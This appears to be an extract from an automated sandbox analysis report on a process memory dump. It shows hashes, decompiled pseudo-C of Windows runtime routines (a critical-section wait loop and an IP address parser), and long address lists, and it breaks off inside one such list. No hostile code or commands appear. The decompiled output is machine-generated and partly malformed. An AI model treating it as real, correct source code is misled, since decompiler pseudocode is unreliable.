                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                              • API String ID: 885266447-871070163
                                                                                                                                                                                                              • Opcode ID: 5ff10f98bc6c096f4818595e759638e5ae89922874f6ac668563f836c8dedc42
                                                                                                                                                                                                              • Instruction ID: 600517cdec4b725ecc61dbbeadc4832de0abeb51c93c90ce8a4aa3d4cbc10385
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ff10f98bc6c096f4818595e759638e5ae89922874f6ac668563f836c8dedc42
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28512671600A056BEF11AB68CC81FA677D8FF59364F104229FD08DB395EAA5EC4187A1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                                              			E0087EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                                                              				intOrPtr* _v28;
                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                              				signed int _v36;
                                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                                              				short _v66;
                                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                              				intOrPtr _t42;
                                                                                                                                                                                                              				intOrPtr _t43;
                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                              				intOrPtr _t48;
                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                                              				intOrPtr _t53;
                                                                                                                                                                                                              				signed char _t67;
                                                                                                                                                                                                              				void* _t72;
                                                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                                                              				intOrPtr* _t80;
                                                                                                                                                                                                              				intOrPtr _t84;
                                                                                                                                                                                                              				intOrPtr* _t85;
                                                                                                                                                                                                              				void* _t91;
                                                                                                                                                                                                              				void* _t92;
                                                                                                                                                                                                              				void* _t93;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t80 = __edi;
                                                                                                                                                                                                              				_t75 = __edx;
                                                                                                                                                                                                              				_t70 = __ecx;
                                                                                                                                                                                                              				_t84 = _a4;
                                                                                                                                                                                                              				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                                                                              					E0086DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                                                                              					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                                              				__eflags = _t38 - 0xffffffff;
                                                                                                                                                                                                              				if(_t38 == 0xffffffff) {
                                                                                                                                                                                                              					_t39 =  *0x93793c; // 0x0
                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                              					_push(_t84);
                                                                                                                                                                                                              					_t40 = E008516C0(_t39);
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_t40 = E0084F9D4(_t38);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_pop(_t85);
                                                                                                                                                                                                              				__eflags = _t40;
                                                                                                                                                                                                              				if(__eflags < 0) {
                                                                                                                                                                                                              					_push(_t40);
                                                                                                                                                                                                              					E00893915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                                                                              					asm("int3");
                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                              						L21:
                                                                                                                                                                                                              						_t76 =  *[fs:0x18];
                                                                                                                                                                                                              						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                                                                              						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                                                                              						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                                                                              							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                                                                              							_v66 = 0x1722;
                                                                                                                                                                                                              							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                                              							_t76 =  &_v72;
                                                                                                                                                                                                              							_push( &_v72);
                                                                                                                                                                                                              							_v28 = _t85;
                                                                                                                                                                                                              							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                                                                              							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                                              							_push(0x10);
                                                                                                                                                                                                              							_push(0x20402);
                                                                                                                                                                                                              							E008501A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                              							_t43 = _v8;
                                                                                                                                                                                                              							_push(_t80);
                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                              							__eflags = _t43 - 0xffffffff;
                                                                                                                                                                                                              							if(_t43 == 0xffffffff) {
                                                                                                                                                                                                              								_t71 =  *0x93793c; // 0x0
                                                                                                                                                                                                              								_push(_t85);
                                                                                                                                                                                                              								_t44 = E00851F28(_t71);
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t44 = E0084F8CC(_t43);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _t44 - 0x102;
                                                                                                                                                                                                              							if(_t44 != 0x102) {
                                                                                                                                                                                                              								__eflags = _t44;
                                                                                                                                                                                                              								if(__eflags < 0) {
                                                                                                                                                                                                              									_push(_t44);
                                                                                                                                                                                                              									E00893915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                                                                              									asm("int3");
                                                                                                                                                                                                              									E008D2306(_t85);
                                                                                                                                                                                                              									__eflags = _t67 & 0x00000002;
                                                                                                                                                                                                              									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                                                                              										_t7 = _t67 + 2; // 0x4
                                                                                                                                                                                                              										_t72 = _t7;
                                                                                                                                                                                                              										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                                                                              										__eflags = _t67 - _t67;
                                                                                                                                                                                                              										if(_t67 == _t67) {
                                                                                                                                                                                                              											E0087EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									return 0;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									__eflags = _v24;
                                                                                                                                                                                                              									if(_v24 != 0) {
                                                                                                                                                                                                              										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									return 2;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L36;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                                                                              							_push(_t67);
                                                                                                                                                                                                              							_t46 = E00894FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                                                                              							_push(_t77);
                                                                                                                                                                                                              							E008A3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                                                                              							_t48 =  *_t85;
                                                                                                                                                                                                              							_t92 = _t91 + 0x18;
                                                                                                                                                                                                              							__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                              							if(_t48 == 0xffffffff) {
                                                                                                                                                                                                              								_t49 = 0;
                                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                                                              							_push(_t49);
                                                                                                                                                                                                              							_t50 = _v12;
                                                                                                                                                                                                              							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                                                                              							_push(_t85);
                                                                                                                                                                                                              							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                                                                              							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                                                                              							E008A3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                                                                              							_t53 =  *_t85;
                                                                                                                                                                                                              							_t93 = _t92 + 0x20;
                                                                                                                                                                                                              							_t67 = _t67 + 1;
                                                                                                                                                                                                              							__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                              							if(_t53 != 0xffffffff) {
                                                                                                                                                                                                              								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                                                              								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _t67 - 2;
                                                                                                                                                                                                              							if(_t67 > 2) {
                                                                                                                                                                                                              								__eflags = _t85 - 0x9320c0;
                                                                                                                                                                                                              								if(_t85 != 0x9320c0) {
                                                                                                                                                                                                              									_t76 = _a4;
                                                                                                                                                                                                              									__eflags = _a4 - _a8;
                                                                                                                                                                                                              									if(__eflags == 0) {
                                                                                                                                                                                                              										E008D217A(_t71, __eflags, _t85);
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                              							_push(0x65);
                                                                                                                                                                                                              							_a8 = _a4;
                                                                                                                                                                                                              							E008A3F92();
                                                                                                                                                                                                              							_t91 = _t93 + 0xc;
                                                                                                                                                                                                              							__eflags =  *0x7ffe0382;
                                                                                                                                                                                                              							if( *0x7ffe0382 != 0) {
                                                                                                                                                                                                              								goto L21;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L36;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					return _t40;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				L36:
                                                                                                                                                                                                              			}

































                                                                                                                                                                                                              0x0087ec56
                                                                                                                                                                                                              0x0087ec56
                                                                                                                                                                                                              0x0087ec56
                                                                                                                                                                                                              0x0087ec5c
                                                                                                                                                                                                              0x0087ec64
                                                                                                                                                                                                              0x008b23e6
                                                                                                                                                                                                              0x008b23eb
                                                                                                                                                                                                              0x008b23eb
                                                                                                                                                                                                              0x0087ec6a
                                                                                                                                                                                                              0x0087ec6c
                                                                                                                                                                                                              0x0087ec6f
                                                                                                                                                                                                              0x008b23f3
                                                                                                                                                                                                              0x008b23f8
                                                                                                                                                                                                              0x008b23fa
                                                                                                                                                                                                              0x008b23fc
                                                                                                                                                                                                              0x0087ec75
                                                                                                                                                                                                              0x0087ec76
                                                                                                                                                                                                              0x0087ec76
                                                                                                                                                                                                              0x0087ec7b
                                                                                                                                                                                                              0x0087ec7c
                                                                                                                                                                                                              0x0087ec7e
                                                                                                                                                                                                              0x008b2406
                                                                                                                                                                                                              0x008b2407
                                                                                                                                                                                                              0x008b240c
                                                                                                                                                                                                              0x008b240d
                                                                                                                                                                                                              0x008b240d
                                                                                                                                                                                                              0x008b240d
                                                                                                                                                                                                              0x008b2414
                                                                                                                                                                                                              0x008b2417
                                                                                                                                                                                                              0x008b241e
                                                                                                                                                                                                              0x008b2435
                                                                                                                                                                                                              0x008b2438
                                                                                                                                                                                                              0x008b243c
                                                                                                                                                                                                              0x008b243f
                                                                                                                                                                                                              0x008b2442
                                                                                                                                                                                                              0x008b2443
                                                                                                                                                                                                              0x008b2446
                                                                                                                                                                                                              0x008b2449
                                                                                                                                                                                                              0x008b2453
                                                                                                                                                                                                              0x008b2455
                                                                                                                                                                                                              0x008b245b
                                                                                                                                                                                                              0x008b245b
                                                                                                                                                                                                              0x0087eb99
                                                                                                                                                                                                              0x0087eb99
                                                                                                                                                                                                              0x0087eb9c
                                                                                                                                                                                                              0x0087eb9d
                                                                                                                                                                                                              0x0087eb9f
                                                                                                                                                                                                              0x0087eba2
                                                                                                                                                                                                              0x008b2465
                                                                                                                                                                                                              0x008b246b
                                                                                                                                                                                                              0x008b246d
                                                                                                                                                                                                              0x0087eba8
                                                                                                                                                                                                              0x0087eba9
                                                                                                                                                                                                              0x0087eba9
                                                                                                                                                                                                              0x0087ebae
                                                                                                                                                                                                              0x0087ebb3
                                                                                                                                                                                                              0x0087ebb9
                                                                                                                                                                                                              0x0087ebbb
                                                                                                                                                                                                              0x008b2513
                                                                                                                                                                                                              0x008b2514
                                                                                                                                                                                                              0x008b2519
                                                                                                                                                                                                              0x008b251b
                                                                                                                                                                                                              0x0087ec2a
                                                                                                                                                                                                              0x0087ec2d
                                                                                                                                                                                                              0x0087ec33
                                                                                                                                                                                                              0x0087ec36
                                                                                                                                                                                                              0x0087ec3a
                                                                                                                                                                                                              0x0087ec3e
                                                                                                                                                                                                              0x0087ec40
                                                                                                                                                                                                              0x0087ec47
                                                                                                                                                                                                              0x0087ec47
                                                                                                                                                                                                              0x0087ec40
                                                                                                                                                                                                              0x008522c6
                                                                                                                                                                                                              0x0087ebc1
                                                                                                                                                                                                              0x0087ebc1
                                                                                                                                                                                                              0x0087ebc5
                                                                                                                                                                                                              0x0087ec9a
                                                                                                                                                                                                              0x0087ec9a
                                                                                                                                                                                                              0x0087ebd6
                                                                                                                                                                                                              0x0087ebd6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0087ebbb
                                                                                                                                                                                                              0x008b2477
                                                                                                                                                                                                              0x008b247c
                                                                                                                                                                                                              0x008b2486
                                                                                                                                                                                                              0x008b248b
                                                                                                                                                                                                              0x008b2496
                                                                                                                                                                                                              0x008b249b
                                                                                                                                                                                                              0x008b249d
                                                                                                                                                                                                              0x008b24a0
                                                                                                                                                                                                              0x008b24a3
                                                                                                                                                                                                              0x008b24aa
                                                                                                                                                                                                              0x008b24aa
                                                                                                                                                                                                              0x008b24a5
                                                                                                                                                                                                              0x008b24a5
                                                                                                                                                                                                              0x008b24a5
                                                                                                                                                                                                              0x008b24ac
                                                                                                                                                                                                              0x008b24af
                                                                                                                                                                                                              0x008b24b0
                                                                                                                                                                                                              0x008b24b3
                                                                                                                                                                                                              0x008b24b9
                                                                                                                                                                                                              0x008b24ba
                                                                                                                                                                                                              0x008b24bb
                                                                                                                                                                                                              0x008b24c6
                                                                                                                                                                                                              0x008b24cb
                                                                                                                                                                                                              0x008b24cd
                                                                                                                                                                                                              0x008b24d0
                                                                                                                                                                                                              0x008b24d1
                                                                                                                                                                                                              0x008b24d4
                                                                                                                                                                                                              0x008b24d6
                                                                                                                                                                                                              0x008b24d9
                                                                                                                                                                                                              0x008b24d9
                                                                                                                                                                                                              0x008b24dc
                                                                                                                                                                                                              0x008b24df
                                                                                                                                                                                                              0x008b24e1
                                                                                                                                                                                                              0x008b24e7
                                                                                                                                                                                                              0x008b24e9
                                                                                                                                                                                                              0x008b24ec
                                                                                                                                                                                                              0x008b24ef
                                                                                                                                                                                                              0x008b24f2
                                                                                                                                                                                                              0x008b24f2
                                                                                                                                                                                                              0x008b24ef
                                                                                                                                                                                                              0x008b24e7
                                                                                                                                                                                                              0x008b24fa
                                                                                                                                                                                                              0x008b24ff
                                                                                                                                                                                                              0x008b2501
                                                                                                                                                                                                              0x008b2503
                                                                                                                                                                                                              0x008b2506
                                                                                                                                                                                                              0x008b250b
                                                                                                                                                                                                              0x0087eb8c
                                                                                                                                                                                                              0x0087eb93
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0087eb93
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0087eb99
                                                                                                                                                                                                              0x0087ec85
                                                                                                                                                                                                              0x0087ec85
                                                                                                                                                                                                              0x0087ec85
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 008B24BD
                                                                                                                                                                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 008B248D
                                                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 008B24FA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                                                              • API String ID: 0-3177188983
                                                                                                                                                                                                              • Opcode ID: 8bfa813e61fb0cfaa50a148e32a00d203cf081eeac4fe5ddd34fdd37d0da5aca
                                                                                                                                                                                                              • Instruction ID: 0dc2bc009b5d2f1ac6e333faad7182d170ef8b86663718ee7fd7a4c7d0a7552d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8bfa813e61fb0cfaa50a148e32a00d203cf081eeac4fe5ddd34fdd37d0da5aca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6641E870600204ABDB20DFA8DC85FAA7BA8FF49320F208645F559DB7D1D734E9418B66
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E0088FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                                                              				signed int _v28;
                                                                                                                                                                                                              				signed int _t105;
                                                                                                                                                                                                              				void* _t110;
                                                                                                                                                                                                              				char _t114;
                                                                                                                                                                                                              				short _t115;
                                                                                                                                                                                                              				void* _t118;
                                                                                                                                                                                                              				signed short* _t119;
                                                                                                                                                                                                              				short _t120;
                                                                                                                                                                                                              				char _t122;
                                                                                                                                                                                                              				void* _t127;
                                                                                                                                                                                                              				void* _t130;
                                                                                                                                                                                                              				signed int _t136;
                                                                                                                                                                                                              				intOrPtr _t143;
                                                                                                                                                                                                              				signed int _t158;
                                                                                                                                                                                                              				signed short* _t164;
                                                                                                                                                                                                              				signed int _t167;
                                                                                                                                                                                                              				void* _t170;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t158 = 0;
                                                                                                                                                                                                              				_t164 = _a4;
                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                              				_v24 = 0;
                                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                                              				_v16 = 0;
                                                                                                                                                                                                              				_v28 = 0;
                                                                                                                                                                                                              				_t136 = 0;
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                                                                              					if(_t167 == _t158) {
                                                                                                                                                                                                              						break;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t118 = _v20 - _t158;
                                                                                                                                                                                                              					if(_t118 == 0) {
                                                                                                                                                                                                              						if(_t167 == 0x3a) {
                                                                                                                                                                                                              							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                                                                              								break;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t119 =  &(_t164[1]);
                                                                                                                                                                                                              								if( *_t119 != _t167) {
                                                                                                                                                                                                              									break;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_t143 = 2;
                                                                                                                                                                                                              								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                                                                              								_v28 = 1;
                                                                                                                                                                                                              								_v8 = _t143;
                                                                                                                                                                                                              								_t136 = _t136 + 1;
                                                                                                                                                                                                              								L47:
                                                                                                                                                                                                              								_t164 = _t119;
                                                                                                                                                                                                              								_v20 = _t143;
                                                                                                                                                                                                              								L14:
                                                                                                                                                                                                              								if(_v24 == _t158) {
                                                                                                                                                                                                              									L19:
                                                                                                                                                                                                              									_t164 =  &(_t164[1]);
                                                                                                                                                                                                              									_t158 = 0;
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if(_v12 == _t158) {
                                                                                                                                                                                                              									if(_v16 > 4) {
                                                                                                                                                                                                              										L29:
                                                                                                                                                                                                              										return 0xc000000d;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t120 = E0088EE02(_v24, _t158, 0x10);
                                                                                                                                                                                                              									_t170 = _t170 + 0xc;
                                                                                                                                                                                                              									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                                                                              									_t136 = _t136 + 1;
                                                                                                                                                                                                              									goto L19;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if(_v16 > 3) {
                                                                                                                                                                                                              									goto L29;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_t122 = E0088EE02(_v24, _t158, 0xa);
                                                                                                                                                                                                              								_t170 = _t170 + 0xc;
                                                                                                                                                                                                              								if(_t122 > 0xff) {
                                                                                                                                                                                                              									goto L29;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                                                                              								goto L19;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						L21:
                                                                                                                                                                                                              						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                                                                              							break;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							if(E0088685D(_t167, 4) == 0) {
                                                                                                                                                                                                              								if(E0088685D(_t167, 0x80) != 0) {
                                                                                                                                                                                                              									if(_v12 > 0) {
                                                                                                                                                                                                              										break;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t127 = 1;
                                                                                                                                                                                                              									_a7 = 1;
                                                                                                                                                                                                              									_v24 = _t164;
                                                                                                                                                                                                              									_v20 = 1;
                                                                                                                                                                                                              									_v16 = 1;
                                                                                                                                                                                                              									L36:
                                                                                                                                                                                                              									if(_v20 == _t127) {
                                                                                                                                                                                                              										goto L19;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									_t158 = 0;
                                                                                                                                                                                                              									goto L14;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								break;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_a7 = 0;
                                                                                                                                                                                                              							_v24 = _t164;
                                                                                                                                                                                                              							_v20 = 1;
                                                                                                                                                                                                              							_v16 = 1;
                                                                                                                                                                                                              							goto L19;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t130 = _t118 - 1;
                                                                                                                                                                                                              					if(_t130 != 0) {
                                                                                                                                                                                                              						if(_t130 == 1) {
                                                                                                                                                                                                              							goto L21;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t127 = 1;
                                                                                                                                                                                                              						goto L36;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_t167 >= 0x80) {
                                                                                                                                                                                                              						L7:
                                                                                                                                                                                                              						if(_t167 == 0x3a) {
                                                                                                                                                                                                              							_t158 = 0;
                                                                                                                                                                                                              							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                                                                              								break;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_t119 =  &(_t164[1]);
                                                                                                                                                                                                              								if( *_t119 != _t167) {
                                                                                                                                                                                                              									_v8 = _v8 + 1;
                                                                                                                                                                                                              									L13:
                                                                                                                                                                                                              									_v20 = _t158;
                                                                                                                                                                                                              									goto L14;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if(_v28 != 0) {
                                                                                                                                                                                                              									break;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_v28 = _v8 + 1;
                                                                                                                                                                                                              								_t143 = 2;
                                                                                                                                                                                                              								_v8 = _v8 + _t143;
                                                                                                                                                                                                              								goto L47;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                                                                              							break;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							_v12 = _v12 + 1;
                                                                                                                                                                                                              							_t158 = 0;
                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(E0088685D(_t167, 4) != 0) {
                                                                                                                                                                                                              						_v16 = _v16 + 1;
                                                                                                                                                                                                              						goto L19;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(E0088685D(_t167, 0x80) != 0) {
                                                                                                                                                                                                              						_v16 = _v16 + 1;
                                                                                                                                                                                                              						if(_v12 > 0) {
                                                                                                                                                                                                              							break;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_a7 = 1;
                                                                                                                                                                                                              						goto L19;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				 *_a8 = _t164;
                                                                                                                                                                                                              				if(_v12 != 0) {
                                                                                                                                                                                                              					if(_v12 != 3) {
                                                                                                                                                                                                              						goto L29;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_v8 = _v8 + 1;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                                                                              					if(_v20 != 1) {
                                                                                                                                                                                                              						if(_v20 != 2) {
                                                                                                                                                                                                              							goto L29;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                                                                              						L65:
                                                                                                                                                                                                              						_t105 = _v28;
                                                                                                                                                                                                              						if(_t105 != 0) {
                                                                                                                                                                                                              							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                                                                              							E00868980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                                                                              							_t110 = 8;
                                                                                                                                                                                                              							E0085DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_v12 != 0) {
                                                                                                                                                                                                              						if(_v16 > 3) {
                                                                                                                                                                                                              							goto L29;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t114 = E0088EE02(_v24, 0, 0xa);
                                                                                                                                                                                                              						_t170 = _t170 + 0xc;
                                                                                                                                                                                                              						if(_t114 > 0xff) {
                                                                                                                                                                                                              							goto L29;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                                                                              						goto L65;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_v16 > 4) {
                                                                                                                                                                                                              						goto L29;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t115 = E0088EE02(_v24, 0, 0x10);
                                                                                                                                                                                                              					_t170 = _t170 + 0xc;
                                                                                                                                                                                                              					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                                                                              					goto L65;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					goto L29;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}

























                                                                                                                                                                                                              0x0088fcd1
                                                                                                                                                                                                              0x0088fcd6
                                                                                                                                                                                                              0x0088fcd9
                                                                                                                                                                                                              0x0088fcdc
                                                                                                                                                                                                              0x0088fcdf
                                                                                                                                                                                                              0x0088fce2
                                                                                                                                                                                                              0x0088fce5
                                                                                                                                                                                                              0x0088fce8
                                                                                                                                                                                                              0x0088fceb
                                                                                                                                                                                                              0x0088fced
                                                                                                                                                                                                              0x0088fced
                                                                                                                                                                                                              0x0088fcf3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0088fcfc
                                                                                                                                                                                                              0x0088fcfe
                                                                                                                                                                                                              0x0088fdc1
                                                                                                                                                                                                              0x008becbd
